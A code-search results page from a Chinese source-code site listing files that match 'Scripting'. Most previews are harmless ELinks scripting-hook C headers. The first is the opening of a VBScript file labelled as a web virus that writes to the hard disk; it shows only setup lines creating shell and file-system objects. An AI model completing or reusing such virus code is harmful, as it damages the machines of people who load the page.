代码搜索:Scripting
找到约 2,777 项符合「Scripting」的源代码
代码结果 2,777
www.eeworm.com/read/243761/12919137
txt 又一个写硬盘的网页病毒程序 .txt
〈script language=vbs〉
On Error Resume Next· 容错语句,避免程序崩溃
set aa=CreateObject("WScript.Shell")·建立WScript对象
Set fs = CreateObject("Scripting.FileSystemObject")·建立文件系统对象
Set dir1 = fs.GetSpecialFo
www.eeworm.com/read/137626/5823045
c hooks.c
/* Guile scripting hooks */
/* $Id: hooks.c,v 1.29 2004/07/15 15:44:05 jonas Exp $ */
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include
#include "elinks.h"
#include "sched/even
www.eeworm.com/read/137626/5823057
c hooks.c
/* Perl scripting hooks */
/* $Id: hooks.c,v 1.15.6.2 2005/02/28 01:22:17 jonas Exp $ */
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include "elinks.h"
#include "protocol/uri.h"
#include "sche
www.eeworm.com/read/137626/5823064
c hooks.c
/* Lua scripting hooks */
/* $Id: hooks.c,v 1.57.6.1 2005/01/29 01:02:32 jonas Exp $ */
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include "elinks.h"
#include "protocol/uri.h"
#include "sched
www.eeworm.com/read/137626/5823072
c hooks.c
/* Ruby scripting hooks */
/* $Id: hooks.c,v 1.7.2.1 2005/01/29 02:06:29 jonas Exp $ */
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include
#include "elinks.h"
#include "protocol/uri